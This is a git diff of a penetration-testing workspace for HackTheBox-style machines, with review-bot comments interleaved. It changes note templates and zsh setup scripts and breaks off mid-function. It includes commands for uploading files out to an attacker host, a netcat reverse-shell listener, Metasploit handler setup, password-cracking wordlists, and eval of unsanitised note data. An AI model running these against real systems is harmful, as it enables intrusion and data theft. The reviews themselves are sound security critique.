diff --git a/.foam/templates/host.md b/.foam/templates/host.md index 0e64be6..720983d 100644 --- a/.foam/templates/host.md +++ b/.foam/templates/host.md @@ -1,6 +1,6 @@ --- title: ${1:$TM_FILENAME_BASE} -tags: host +type: host foam_template: filepath: 'hosts/$FOAM_TITLE/$FOAM_TITLE.md' name: 'host' @@ -9,10 +9,18 @@ foam_template: ### ${1:$TM_FILENAME_BASE} -#### host alias +#### host location -- ${1:$TM_FILENAME_BASE} -- ip: +```yaml host +- hostname: ${1:$TM_FILENAME_BASE} + is_dc: false + ip: 10.10.10.10 + alias: ["${1:$TM_FILENAME_BASE}"] # if is DC, please set the dc hostname as the first alias, such as ["dc01.example.com"] +``` + +```zsh env-invoked +set_current_host ${1:$TM_FILENAME_BASE} +``` #### ports diff --git a/.foam/templates/service.md b/.foam/templates/service.md index 3fac94f..2763079 100644 --- a/.foam/templates/service.md +++ b/.foam/templates/service.md @@ -1,6 +1,6 @@ --- title: ${1:$TM_FILENAME_BASE} -tags: service +type: service foam_template: filepath: 'services/$FOAM_TITLE/$FOAM_TITLE.md' name: 'service' @@ -15,6 +15,10 @@ foam_template: #### location +```zsh env-invoked +# this will be automaticially invoked in your shell when you use this template +``` + On host yyy port xxx #### information diff --git a/.foam/templates/user.md b/.foam/templates/user.md index 4c1616a..f6afa1b 100644 --- a/.foam/templates/user.md +++ b/.foam/templates/user.md @@ -1,6 +1,6 @@ --- title: ${1:$TM_FILENAME_BASE} -tags: user +type: user foam_template: filepath: 'users/$FOAM_TITLE/$FOAM_TITLE.md' name: 'user' @@ -11,10 +11,15 @@ foam_template: #### validated credentials -```yaml +```yaml credentials - login: ${FOAM_TITLE/^(\S*)@//} user: ${FOAM_TITLE/@(\S*)$//} password: pass + nt_hash: fffffffffffffffffffffffffffffffffff +``` + +```zsh env-invoked +set_current_user ${FOAM_TITLE/@(\S*)$//} ``` #### information diff --git a/.gitignore b/.gitignore index 64b8eba..755e400 100644 --- a/.gitignore +++ b/.gitignore 
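Review bot: Every host note created from this template carries a live `set_current_host` call in its `zsh env-invoked` block, and the `auto_invoker` loop added to `.vscode/env.zsh` in this commit sources that block from every note at shell start. The current host therefore ends up being whichever note `find` happens to list last, not one the operator selected; the same holds for `set_current_user` in the `user.md` hunk further down. Consider shipping the line commented out and quoted, `# set_current_host '${1:$TM_FILENAME_BASE}'`, as the `service.md` template does with its placeholder comment. Quoting also keeps a title containing spaces or shell metacharacters from being parsed as extra words or commands when the note is sourced.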
@@ -4,7 +4,8 @@ hosts/ users/ services/ index.md -Makefile .DS_Store .vscode/.command_history -zsh_history \ No newline at end of file +zsh_history +weapon_test +test* \ No newline at end of file diff --git a/.vscode/.zshrc b/.vscode/.zshrc index b047066..364c2cc 100644 --- a/.vscode/.zshrc +++ b/.vscode/.zshrc @@ -1,19 +1,19 @@ # POST executed after the shell is loaded # This file is loaded after .zshrc -# you can define any functions,settings,automation here. +# you can define any functions,settings,automation here. source ${PROJECT_FOLDER}/.vscode/env.zsh if [ "$WEB_DELIVERY_MODE" ]; then if [ -z "$PROJECT_WEB_DELIVERY" ]; then echo "PROJECT_WEB_DELIVERY is not set. Please set it in .vscode/env.zsh" - else + else if [ -d "$PROJECT_WEB_DELIVERY" ]; then echo "FOLDER $PROJECT_WEB_DELIVERY exists." else mkdir -p $PROJECT_WEB_DELIVERY - echo "*" > $PROJECT_WEB_DELIVERY/.gitignore + echo "*" >$PROJECT_WEB_DELIVERY/.gitignore echo "FOLDER $PROJECT_WEB_DELIVERY created." fi fi 
@@ -45,32 +45,33 @@ if [ "$WEB_DELIVERY_MODE" ]; then echo "curl http://$LHOST:$LISTEN_ON/uploadfile --upload-file filename" echo "curl http://$LHOST:$LISTEN_ON/uploadfile -T filename" echo "wget --output-document - --method=PUT http://$LHOST:$LISTEN_ON/uploadfile --body-file=filename" - echo "invoke-webrequest -Uri http://$LHOST:$LISTEN_ON/uploadfile -Method PUT -InFile filename" + echo "invoke-webrequest -Uri http://$LHOST:$LISTEN_ON/uploadfile -Method PUT -InFile filename" echo "==============================================================================================" echo "PS: If your terminal can't display this notes properly, you need resize your terminal window." echo "" # ProjectDiscovery/SimpleHTTPServer simplehttpserver -listen 0.0.0.0:$LISTEN_ON -verbose -upload # python3 -m http.server $LISTEN_ON + read exit 0 -fi - +fi export METASPLOIT_INIT_COMMAND="${METASPLOIT_INIT_COMMAND} setg RHOSTS $RHOST;" export METASPLOIT_INIT_COMMAND="${METASPLOIT_INIT_COMMAND} setg LHOST $LHOST;" export METASPLOIT_INIT_COMMAND="${METASPLOIT_INIT_COMMAND} setg LPORT $LPORT;" export METASPLOIT_INIT_COMMAND="${METASPLOIT_INIT_COMMAND} setg VHOST $DOMAIN;" - if [ "$METASPLOIT_HANDLER_MODE" ]; then msfconsole -r "$PROJECT_FOLDER/.vscode/metasploit_handler.rc" \ -x "${METASPLOIT_INIT_COMMAND}" + read exit 0 fi -if [ "$METASPLOIT_CONSOLE_MODE" ]; then +if [ "$METASPLOIT_CONSOLE_MODE" ]; then msfconsole -r "$PROJECT_FOLDER/.vscode/msfconsole.rc" \ -x "${METASPLOIT_INIT_COMMAND}" + read exit 0 fi @@ -83,13 +84,14 @@ if [ "$REVERSE_SHELL_MODE" ]; then echo "Advanced: " echo " https://rev.eson.ninja/?ip=${LHOST}&port=${LPORT}" echo "" - rlwrap -I -cAr nc -lvvp ${LPORT} + rlwrap -I -cAr netcat -lvvp ${LPORT} + read; exit 0 fi # Start the virtual environment if exists if [ -d "$PROJECT_FOLDER/venv" ]; then - if [ -n "${VIRTUAL_ENV}" ];then + if [ -n "${VIRTUAL_ENV}" ]; then # sliently deactivate the virtual environment # echo "Virtual Environment is already activated." 
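Review bot: The bare `read` added before each `exit 0` (after `simplehttpserver` and after both `msfconsole` calls) waits with no prompt, so a terminal whose tool has already exited looks hung. This file is zsh-only, so `read -r '?Press Enter to close this terminal '` states what is expected; `-r` also stops backslashes in the typed line from being interpreted. A short comment such as `# keep the pane open so the tool's last output stays readable` would record why the pause is there, if that is the intent. The same bare `read;` is added in the reverse-shell hunk that follows.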
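Review bot: Switching the listener from `nc` to `netcat` makes this profile depend on a command name that is not installed everywhere. `settings.json` in this commit defines the same `netcat-handler` profile for macOS, where the tool is commonly available only as `nc` (worth confirming on a clean machine). A fallback keeps both working: `rlwrap -I -cAr "${commands[netcat]:-nc}" -lvvp "${LPORT}"`, which also quotes the port. The enclosing `if [ "$REVERSE_SHELL_MODE" ]` block starts outside the hunk.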
@@ -97,80 +99,35 @@ if [ -d "$PROJECT_FOLDER/venv" ]; then # echo "Trying to deactivate the virtual environment automatically." # force deactivate the virtual environment - if [ -n "${_OLD_VIRTUAL_PATH:-}" ] - then - PATH="${_OLD_VIRTUAL_PATH:-}" - export PATH - unset _OLD_VIRTUAL_PATH + if [ -n "${_OLD_VIRTUAL_PATH:-}" ]; then + PATH="${_OLD_VIRTUAL_PATH:-}" + export PATH + unset _OLD_VIRTUAL_PATH fi - if [ -n "${_OLD_VIRTUAL_PYTHONHOME:-}" ] - then - PYTHONHOME="${_OLD_VIRTUAL_PYTHONHOME:-}" - export PYTHONHOME - unset _OLD_VIRTUAL_PYTHONHOME + if [ -n "${_OLD_VIRTUAL_PYTHONHOME:-}" ]; then + PYTHONHOME="${_OLD_VIRTUAL_PYTHONHOME:-}" + export PYTHONHOME + unset _OLD_VIRTUAL_PYTHONHOME fi - if [ -n "${BASH:-}" -o -n "${ZSH_VERSION:-}" ] - then - hash -r 2> /dev/null + if [ -n "${BASH:-}" -o -n "${ZSH_VERSION:-}" ]; then + hash -r 2>/dev/null fi - if [ -n "${_OLD_VIRTUAL_PS1:-}" ] - then - PS1="${_OLD_VIRTUAL_PS1:-}" - export PS1 - unset _OLD_VIRTUAL_PS1 + if [ -n "${_OLD_VIRTUAL_PS1:-}" ]; then + PS1="${_OLD_VIRTUAL_PS1:-}" + export PS1 + unset _OLD_VIRTUAL_PS1 fi unset VIRTUAL_ENV unset VIRTUAL_ENV_PROMPT - if [ ! "${1:-}" = "nondestructive" ] - then + if [ ! "${1:-}" = "nondestructive" ]; then # deactivate always useless here # unset -f deactivate fi fi - + source $PROJECT_FOLDER/venv/bin/activate fi -# Auto Create Project Note Structure. -function create_project_structure () { - if [ -f "${PROJECT_FOLDER}/Makefile" ];then # lock the project folder - return - fi - mkdir -p $PROJECT_FOLDER/{hosts,users,services} - touch $PROJECT_FOLDER/entrypoint.md - touch $PROJECT_FOLDER/Makefile - - echo "Project Folder sturcture created completed!" - echo "===================== MANUAL =====================" - echo "Note: this function will not run again if Makefile is exists!" 
- echo "if you don't need created folder structure" - echo "Clean Project Folder: " - echo " clean_project_structure" - echo "" - echo "Create Notes:" - echo " User: " - echo " new-user " - echo " Host:" - echo " new-host " - echo " Service: " - echo " new-service " - echo "Delete Notes:" - echo " User: " - echo " del-user " - echo " Host:" - echo " del-host " - echo " Service: " - echo " del-service " - echo "==================================================" -} -create_project_structure -unset -f create_project_structure - -function clean_project_structure () { - rm -rf $PROJECT_FOLDER/{hosts,users,services} $PROJECT_FOLDER/entrypoint.md # $PROJECT_FOLDER/Makefile - echo "Project Folder sturcture cleaned completed!" -} - # change hist file location in project. HISTSIZE=100000000 SAVEHIST=100000000 @@ -184,13 +141,13 @@ setopt inc_append_history setopt share_history setopt hist_save_no_dups setopt histignorealldups -setopt EXTENDED_HISTORY # with timestamp -fc -R -I ${OLD_HISTFILE} # loading the old histfile +setopt EXTENDED_HISTORY # with timestamp +fc -R -I ${OLD_HISTFILE} # loading the old histfile -if [[ "$HIST_COMMAND_INDEXER" != "" ]]; then +if [[ "$HIST_COMMAND_INDEXER" != "" ]]; then if [[ ! -f ${HIST_COMMAND_INDEXER} ]]; then echo "HIST_COMMAND_INDEXER file not found: ${HIST_COMMAND_INDEXER}" - else + else fc -R -I ${HIST_COMMAND_INDEXER} # loading the command indexer fi -fi +fi diff --git a/.vscode/env.zsh b/.vscode/env.zsh index 3181ed3..d5ff082 100644 --- a/.vscode/env.zsh +++ b/.vscode/env.zsh 
@@ -2,106 +2,215 @@ ################################################################ # Project settings for Zsh Prompt # export HOST="[HackTheBox - Machine Name]" +unset USER_ZDOTDIR ################################################################ -# Target settings -export RHOST=10.10.X.X -# works well on HTB and THM, Put your reverse IP here. - +# Self condition settings # use this if you are using a VPS or cloud server it can automatically get your public IP. -# export LHOST=`curl ifconfig.me` +# export LHOST=`curl ifconfig.me` # export LHOST=`curl ip.me` -export LHOST=`ifconfig|grep '10\.10\.'|cut -d ' ' -f2` +if command -v ifconfig >/dev/null 2>&1; then + export LHOST=${$(ifconfig | grep '10\.10\.' | cut -d ' ' -f2):-10.0.0.1} +else + export LHOST=${$(ip a | grep '10\.10\.' | cut -d ' ' -f6 | cut -d '/' -f1):-10.0.0.1} +fi export ATTACKER_IP=$LHOST export LPORT=6789 -export DOMAIN= -export TARGET=${DOMAIN:-${RHOST}} # target is target hostname if not set use RHOST ip +################################################################ +# Target settings +# export RHOST=10.10.X.X +# works well on HTB and THM, Put your reverse IP here. +# export DOMAIN= -export IP=${RHOST} # alias rhost -export ip=${IP} # alias as IP -export DC_IP=${RHOST} # alias rhost -export DC_HOST=dc01.${DOMAIN} # domain controller host, if not set use dc01.domain.com +# export TARGET=${DOMAIN:-${RHOST}} # target is target hostname if not set use RHOST ip -export USER_A=username -export PASS_A=password -export NT_HASH_A=ffffffffffffffffffffffffffffffff # NTLM hash, if you have it +# export IP=${RHOST} # alias rhost +# export ip=${IP} # alias as IP +# export DC_IP=${RHOST} # alias rhost +# export DC_HOST=dc01.${DOMAIN} # domain controller host, if not set use dc01.domain.com -export USER_B= -export PASS_B= +function cut_lines_from_markdown_codes() { + local file_path=$1 + if [[ ! -f $file_path ]]; then + echo "no such file!" 
+ return 1 + fi + local identity='```'$2 + local line=$(grep -n -E '^```' "$file_path" | grep "$identity" -A1 | cut -d : -f1) + local line_no_list=$(echo "$line" | awk 'NR%2==1{T=$0;next}{print T "|" $0}') + for line_no in $(echo $line_no_list); do + local line_no_start=$(echo $line_no | cut -d "|" -f 1) + local line_no_end=$(echo $line_no | cut -d "|" -f 2) + local line_start=$(($line_no_start + 1)) + if [[ "$line_no_end" == "$line_start" ]]; then # if the next line is the same as the start line, then it is empty + echo "" + return + fi + local line_end=$(($line_no_end - 1)) + if [[ "$line_start" == "1" && "$line_end" == "-1" ]]; then + return 1 + fi + sed -n "${line_start},${line_end}p" "$file_path" + done +} -export CURRENT=A # set the current username -export CURRENT_USER=`eval echo '$USER_'$CURRENT` # alias for USER_A -export CURRENT_PASS=`eval echo '$PASS_'$CURRENT` # alias for PASS_A -export CURRENT_NT_HASH=`eval echo '$NT_HASH_'$CURRENT` # alias for NT_HASH_A +function safe_name() { + local name=$1 + if [[ -z $name ]]; then + echo "Usage: safe_name " + return 1 + fi + echo "$name" | tr '@$.- [](){}!#' '_' # replace . and - with _ to avoid env var issues +} -# defined variables if u need -export USER=${CURRENT_USER} -export USERNAME=${CURRENT_USER} -export PASS=${CURRENT_PASS} -export PASSWORD=${CURRENT_PASS} # alias for PASS -export NT_HASH=${CURRENT_NT_HASH} # alias for NT_HASH_A +function update_host_to_env() { + if [[ -x "$(command -v yq)" && -d "${PROJECT_FOLDER}/hosts" ]]; then + for ur in ${(@f)"$(ls -1 ${PROJECT_FOLDER}/hosts)"}; do + local file="${PROJECT_FOLDER}/hosts/${ur}/${ur}.md" + if [ -f "$file" ]; then + local host_data=$(cut_lines_from_markdown_codes "$file" "yaml host") + + local hostname=$(echo "$host_data" | yq '.[0].hostname' -r) + local _var=$(safe_name "$hostname" ) # replace . 
and - with _ to avoid env var issues + + local ip=$(echo "$host_data" | yq '.[0].ip' -r) + local is_dc=$(echo "$host_data" | yq '.[0].is_dc' -r) + if [[ "$is_dc" == "true" ]]; then + export DC_HOST_${_var}=$(echo "$host_data" | yq '.[0].alias.[0]') + export DC_HOST=$(echo "$host_data" | yq '.[0].alias.[0]') # default dc01.domain.com + export DC_IP_${_var}=$ip + export DC_IP=${ip} + export IS_DC_${_var}="true" + fi + local count=1 + for alias in $(echo "$host_data"|yq '.[0].alias.[]' -r ); do + export HOST_ALIAS_${_var}_${count}=$alias # replace . and - with _ to avoid env var issues + count=$((count + 1)) + done + export HOST_${_var}=$hostname + export IP_${_var}=$ip + fi + done + fi +} +update_host_to_env + +function set_current_host() { + if [[ -z $1 ]]; then + echo "current host is set to ${CURRENT_HOST}" + echo "Usage: set_current_host " + echo "Example: set_current_host dc01" + echo "supported hosts: " + echo "" + env | egrep '^HOST_' | sed -e 's/HOST_//g' | awk '{printf "- " $1 "\n"}' | sed -e 's/=/: /g' | sort + return 1 + fi + export CURRENT_HOST=$(safe_name "$1") # replace . 
and - with _ to avoid env var issues + export CURRENT_IP=$(eval echo '$IP_'$CURRENT_HOST) # alias for IP_dc01 or IP_dc02 + export CURRENT_HOSTNAME=$(eval echo '$HOST_'$CURRENT_HOST) # alias for HOST_dc01 or HOST_dc02 + + # defined variables if u need + export RHOST=${CURRENT_IP} + export IP=${CURRENT_IP} + export DOMAIN=${CURRENT_HOSTNAME} # alias for DOMAIN_dc01 or DOMAIN_dc02 + export TARGET=${DOMAIN:-${RHOST}} # target is target hostname if not set use RHOST ip + if [[ "$(eval echo '$IS_DC_'$CURRENT_HOST)" == "true" ]]; then + export DC_IP=$(eval echo '$DC_IP_'$CURRENT_HOST) # alias for DC_IP_dc01 or DC_IP_dc02 + export DC_HOST=$(eval echo '$DC_HOST_'$CURRENT_HOST) # alias for DC_HOST_dc01 or DC_HOST_dc02 + fi +} +# set_current_host xx.htb + +# auto set the data in the +function update_user_cred_to_env() { + if [[ -x "$(command -v yq)" && -d "${PROJECT_FOLDER}/users" ]]; then + for ur in ${(@f)"$(ls -1 ${PROJECT_FOLDER}/users)"}; do + local file="${PROJECT_FOLDER}/users/${ur}/${ur}.md" + if [ -f "$file" ]; then + local usercred=$(cut_lines_from_markdown_codes "$file" "yaml credentials") + + local user=$(echo "$usercred" | yq '.[0].user' -r) + local _var=$(safe_name "$user") # replace . and - with _ to avoid env var issues + local pass=$(echo "$usercred" | yq '.[0].password' -r) + local nt_hash=$(echo "$usercred" | yq '.[0].nt_hash' -r) + local login=$(echo "$usercred" | yq '.[0].login' -r) + export LOGIN_${_var}=$login + export USER_${_var}=$user + export PASS_${_var}=$pass + export NT_HASH_${_var}=$nt_hash + fi + done + fi +} +update_user_cred_to_env + +function set_current_user() { + if [[ -z $1 ]]; then + echo "current user is set to ${CURRENT}" + echo "Usage: set_current_user " + echo "Example: set_current_user A" + echo "supported users: " + echo "" + env | egrep '^USER_' | sed -e 's/USER_//g' | awk '{printf "- " $1 "\n"}' | sed -e 's/=/: /g' | sort + return 1 + fi + export CURRENT=$(safe_name "$1" ) # replace . 
and - with _ to avoid env var issues + export CURRENT_USER=$(eval echo '$USER_'$CURRENT) # alias for USER_A or USER_B + export CURRENT_PASS=$(eval echo '$PASS_'$CURRENT) # alias for PASS_A or PASS_B + export CURRENT_NT_HASH=$(eval echo '$NT_HASH_'$CURRENT) # alias for NT_HASH_A or NT_HASH_B + export CURRENT_LOGIN=$(eval echo '$LOGIN_'$CURRENT) # alias for LOGIN_A or LOGIN_B + + # defined variables if u need + export USER=${CURRENT_USER} + export USERNAME=${CURRENT_USER} + export PASS=${CURRENT_PASS} + export PASSWORD=${CURRENT_PASS} # alias for PASS + export NT_HASH=${CURRENT_NT_HASH} # alias for NT_HASH_A + export LOGIN=${CURRENT_LOGIN} # alias for LOGIN_A +} +# set_current_user + +### auto invoke the commands in markdown files +function auto_invoker() { + for markdown in ${(@f)"$(find ${PROJECT_FOLDER}/{users,hosts,services} -iname "*.md" 2>/dev/null)"}; do # list all markdown files in users, hosts, services + local auto_invoker=$(cut_lines_from_markdown_codes "$markdown" "zsh env-invoked") + if [[ -n "$auto_invoker" ]]; then + source <(echo "$auto_invoker") # source it! + fi + done +} +auto_invoker + +function current_status() { + if [[ -z $CURRENT_RHOST ]]; then + echo "No current host set." + else + echo "Current Host: ${TARGET} => ${DOMAIN} (${RHOST}) ${DC_HOST} ${DC_IP}" + fi + if [[ -z $CURRENT_USER ]]; then + echo "No current user set." + else + echo "Current User: ${USER} => ${USER}:${PASS} (${NT_HASH})" + fi +} +if [[ ! 
-z "$SHOW_CURRENT_STATUS" ]]; then + current_status +fi # export KRB5CCNAME= -# FAKETIME settings # export LD_PRELOAD=/usr/local/lib/libfaketime.so.1 # export LD_PRELOAD=/usr/lib/aarch64-linux-gnu/faketime/libfaketime.so.1 # export DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=/opt/homebrew/Cellar/libfaketime/0.9.10/lib/faketime/libfaketime.1.dylib # export FAKETIME="-8h" - export METASPLOIT_INIT_COMMAND="" -################################################################ -# Advanced settings - -# AWS settings -# export AWS_DEFAULT_REGION=us-west-2 -# export AWS_ACCESS_KEY_ID=AKIA... -# export AWS_SECRET_ACCESS_KEY=... -# export AWS_SESSION_TOKEN=... -# export AWS_ENDPOINT_URL= - -# VAULT settings -# export VAULT_ADDR= -# export VAULT_TOKEN=... - -# MINIO settings -# export MINIO_ROOT_USER=... # access key -# export MINIO_ROOT_PASSWORD=... # secret key -# export MINIO_ENDPOINT= -# export MC_HOST_myminio=http://${MINIO_ROOT_USER}:${MINIO_ROOT_PASSWORD}@${MINIO_ENDPOINT} - -# Kubernetes settings -# export KUBECONFIG=${PROJECT_FOLDER}/kubeconfig - -# Terraform settings -export TF_LOG=trace -export TF_LOG_PATH=$PROJECT_FOLDER/terraform.log -# export TF_VAR_aws_access_key=... -# export TF_VAR_aws_secret_key=... -# export TF_VAR_aws_session_token=... 
-# export TF_VAR_aws_region=us-west-2 - -# OpenStack settings -# export OS_USERNAME=username -# export OS_PASSWORD=password -# export OS_TENANT_NAME=projectName -# export OS_AUTH_URL=https://identityHost:portNumber/v2 -# The following lines can be omitted -# export OS_TENANT_ID=tenantIDString -# export OS_REGION_NAME=regionName -# export OS_CACERT=/path/to/cacertFile -# export OS_TOKEN=tokenString - -################################################################ -# More default settings - export PROJECT_WEB_DELIVERY=$PROJECT_FOLDER/.web-delivery # web-delivery is a folder in PROJECT_FOLDER -unset SSS_LOADED # make sure sss init shell is not set +unset SSS_LOADED # make sure sss init shell is not set ################################################################ # Network settings clean up and reset @@ -114,10 +223,10 @@ unset https_proxy http_proxy all_proxy # Hashcat settings # useful settings like ROCKYOU, SECLIST, etc. -# export ROCKYOU=/usr/share/wordlists/rockyou.txt -# export SECLIST=/usr/share/wordlists/seclists/ -# export TOP_DNS=${SECLIST}/Discovery/DNS/bitquark-subdomains-top100000.txt -# export WORDLISTS=/usr/share/wordlists/ +export WORDLIST=${WORDLIST:-/usr/share/wordlists} +export ROCKYOU=${WORDLIST}/rockyou.txt +export SECLIST=${WORDLIST}/seclists/ +export TOP_DNS=${SECLIST}/Discovery/DNS/bitquark-subdomains-top100000.txt export HASHCAT_MODE_WORDLIST=0 export HASHCAT_MODE_COMBINATION=1 
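Review bot: `set_current_host` and `set_current_user` build variable names from note data and expand them with `eval echo '$IP_'$CURRENT_HOST`, while `safe_name` only replaces a fixed list of characters, so a host or user value containing anything outside that list (`;`, a backtick, `|`, quotes) is re-parsed by the shell as code. The `tr` set in `safe_name` also places `-` between `.` and a space, which GNU `tr` appears to read as a reversed range and reject; if so, `safe_name` returns an empty suffix and the exports become `USER_=`, `IP_=` and so on. An allow-list in `safe_name` plus zsh's `${(P)name}` indirect expansion removes the `eval` entirely; the sketch shows `set_current_host`, and `set_current_user` would follow the same pattern. Separately, `current_status` tests `$CURRENT_RHOST`, which nothing in this hunk sets, and it prints `${PASS}` to the terminal whenever `SHOW_CURRENT_STATUS` is set.

```shell
function safe_name() {
  # … unchanged: local name=$1 and the usage check …
  # allow-list: every byte that is not a letter, digit or underscore becomes "_"
  printf '%s\n' "$name" | tr -c 'A-Za-z0-9_\n' '_'
}

function set_current_host() {
  # … unchanged: usage output when $1 is empty …
  export CURRENT_HOST=$(safe_name "$1")
  local ip_ref=IP_$CURRENT_HOST host_ref=HOST_$CURRENT_HOST
  export CURRENT_IP=${(P)ip_ref}          # indirect expansion instead of eval
  export CURRENT_HOSTNAME=${(P)host_ref}
  # … unchanged: RHOST/IP/DOMAIN/TARGET exports; the IS_DC_/DC_IP_/DC_HOST_ lookups take the same ${(P)…} form …
}
```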
@@ -153,131 +262,219 @@ export HASH_KRB5_TGS_18=19700 export HASH_JWT=16500 export HASH_KRB5_AS_REP_23=18200 - # utils functions ### functions function proxys() { - export Proxy="127.0.0.1" # define as your favour - export ProxyPort="7890" # define as your favour + export Proxy="127.0.0.1" # define as your favour + export ProxyPort="7890" # define as your favour case "$1" in - (h) - echo "|==============================================|" - echo "| $0 Usage |" - echo "| ---- fast commandline proxy switcher |" - echo "|==============================================|" - echo "| Basic Usage: $0 [SubCommand] [param1] |" - echo "|==============================================|" - echo "| Sub Command List |" - echo "|==============================================|" - echo "| proxy [proxy_ip] import ip temply |" - echo "| port [port_id] import port temply |" - echo "| loc import localhost |" - echo "| on up the cli proxy |" - echo "| off down the proxy |" - echo "| * show proxy setting |" - echo "| h/help show help |" - echo "|==============================================|" - ;; - (proxy) - export Proxy="$2" - ;; - (port) - export ProxyPort="$2" - ;; - (loc) - export Proxy="127.0.0.1" # define as your favour - export ProxyPort="7890" # define as your favour - $0 on - ;; - (on) - export https_proxy=http://$Proxy:$ProxyPort \ - http_proxy=http://$Proxy:$ProxyPort && \ + h) + echo "|==============================================|" + echo "| proxys Usage |" + echo "| ---- fast commandline proxy switcher |" + echo "|==============================================|" + echo "| Basic Usage: proxys [SubCommand] [param1] |" + echo "|==============================================|" + echo "| Sub Command List |" + echo "|==============================================|" + echo "| proxy [proxy_ip] import ip temply |" + echo "| port [port_id] import port temply |" + echo "| loc import localhost |" + echo "| set [protocol]://[proxy_ip]:[port] set proxy |" + echo "| on up the cli proxy |" 
+ echo "| off down the proxy |" + echo "| * show proxy setting |" + echo "| h/help show help |" + echo "|==============================================|" + ;; + set) + if [ -z "$2" ]; then + echo "Usage: $0 set [protocol]://[proxy_ip]:[port]" + echo "Example: $0 set http://127.0.0.1:8080" + else + export http_proxy="$2" \ + https_proxy="$2" \ + all_proxy="$2" && + echo "export Proxy complete" && $0 show + fi + ;; + proxy) + export Proxy="$2" + ;; + port) + export ProxyPort="$2" + ;; + loc) + export Proxy="127.0.0.1" # define as your favour + export ProxyPort="7890" # define as your favour + $0 on + ;; + on) + export https_proxy=http://$Proxy:$ProxyPort \ + http_proxy=http://$Proxy:$ProxyPort && echo 'export Proxy complete' && $0 show - ;; - (off) - unset https_proxy http_proxy all_proxy && echo 'unset Proxy complete' - ;; - (help) - proxys h - ;; - (*) - echo "Current Proxy Condition like ...." - export|grep proxy - echo "if you can't see any output like 'XX_PROXY=' there" - echo "That means no proxy is set" - ;; + ;; + off) + unset https_proxy http_proxy all_proxy && echo 'unset Proxy complete' + ;; + help) + proxys h + ;; + *) + echo "Current Proxy Condition like ...." + export | grep proxy + echo "if you can't see any output like 'XX_PROXY=' there" + echo "That means no proxy is set" + ;; esac } -function venv-init () { - python3 -m venv venv +function venv-init() { + python3 -m venv venv } -function venv-activate () { - if [ -d "./venv/" ] - then +function venv-activate() { + if [ -d "./venv/" ]; then source "./venv/bin/activate" - else + else echo "No Python venv there. 
Error" fi } -function goproxy () { +function goproxy() { case "$1" in - (on) export GOPROXY=https://goproxy.io,direct ;; - (off) unset GOPROXY ;; - (*) $0 on/off ;; + on) export GOPROXY=https://goproxy.io,direct ;; + off) unset GOPROXY ;; + *) $0 on/off ;; esac } -function url () { +function url() { case "$1" in - (h |-h |help| --help) - which $0 - ;; - (decode | d | -d | --decode) if [ -z "$2" ] - then - \python3 -c "import sys; from urllib.parse import unquote; print(unquote(sys.stdin.read()));" - else - \python3 -c "import sys; from urllib.parse import unquote; print(unquote(' '.join(sys.argv[2:])));" "$@" - fi ;; - (encode | e | -e | --encode) if [ -z "$2" ] - then - \python3 -c "import sys; from urllib.parse import quote; print(quote(sys.stdin.read()[:-1]));" - else - \python3 -c "import sys; from urllib.parse import quote; print(quote(' '.join(sys.argv[2:])));" "$@" - fi ;; + h | -h | help | --help) + which $0 + ;; + decode | d | -d | --decode) if [ -z "$2" ]; then + \python3 -c "import sys; from urllib.parse import unquote; print(unquote(sys.stdin.read()));" + else + \python3 -c "import sys; from urllib.parse import unquote; print(unquote(' '.join(sys.argv[2:])));" "$@" + fi ;; + encode | e | -e | --encode) if [ -z "$2" ]; then + \python3 -c "import sys; from urllib.parse import quote; print(quote(sys.stdin.read()[:-1]));" + else + \python3 -c "import sys; from urllib.parse import quote; print(quote(' '.join(sys.argv[2:])));" "$@" + fi ;; esac } # Here is mode if-tree complete, Now will launch the shell # export SUBDOMAIN_WORDLIST=$SECLIST/Discovery/DNS/bitquark-subdomains-top100000.txt # pipx install wfuzz -# alias wfuzz=docker run --rm --name wfuzz -v /usr/share/wordlists:/wordlists/ -it ghcr.io/xmendez/wfuzz wfuzz +# alias wfuzz=docker run --rm --name wfuzz -v /usr/share/wordlists:/wordlists/ -it ghcr.io/xmendez/wfuzz wfuzz # usage: alias wfuzz_http_vhost='wfuzz -c -w $SUBDOMAIN_WORDLIST -H "Host: FUZZ.$host" -u "http://$host"' # usage: alias 
wfuzz_https_vhost='wfuzz -c -w $SUBDOMAIN_WORDLIST -H "Host: FUZZ.$host" -u "https://$host"' alias wfuzz=\wfuzz -# unset -f wfuzz_vhost_http -function wfuzz_vhost_http () { - local host=$1 - local wordlist=$2 - if [[ -z $wordlist ]] || [[ -z $host ]] - then - echo "Usage: wfuzz_vhost [wfuzz options]" - return - fi - wfuzz -c -w $wordlist -H "Host: FUZZ.$host" -u "http://$host" $3 $4 $5 $6 $7 $8 $9 $10 $11 $12 $13 $14 $15 $16 $17 $18 $19 +# unset -f wfuzz_vhost_http +function wfuzz_vhost_http() { + local host=$1 + local wordlist=$2 + if [[ -z $wordlist ]] || [[ -z $host ]]; then + echo "Usage: wfuzz_vhost [wfuzz options]" + return + fi + wfuzz -c -w $wordlist -H "Host: FUZZ.$host" -u "http://$host" $3 $4 $5 $6 $7 $8 $9 $10 $11 $12 $13 $14 $15 $16 $17 $18 $19 } # unset -f wfuzz_vhost_https -function wfuzz_vhost_https () { - local host=$1 - local wordlist=$2 - if [[ -z $wordlist ]] || [[ -z $host ]] - then - echo "Usage: wfuzz_vhost [wfuzz options]" - return - fi - wfuzz -c -w $wordlist -H "Host: FUZZ.$host" -u "https://$host" $3 $4 $5 $6 $7 $8 $9 $10 $11 $12 $13 $14 $15 $16 $17 $18 $19 +function wfuzz_vhost_https() { + local host=$1 + local wordlist=$2 + if [[ -z $wordlist ]] || [[ -z $host ]]; then + echo "Usage: wfuzz_vhost [wfuzz options]" + return + fi + wfuzz -c -w $wordlist -H "Host: FUZZ.$host" -u "https://$host" $3 $4 $5 $6 $7 $8 $9 $10 $11 $12 $13 $14 $15 $16 $17 $18 $19 +} + +function ntlm() { + if [ -n "$1" ]; then + python3 -c 'import hashlib,binascii;hash = hashlib.new("md4", "'$1'".encode("utf-16le")).digest();print(binascii.hexlify(hash).decode("utf-8"))' + if [[ $? -ne 0 ]]; then + echo "Error: ntlm hash generation failed. " + echo "if not support md4 hash, please check your openssl config." 
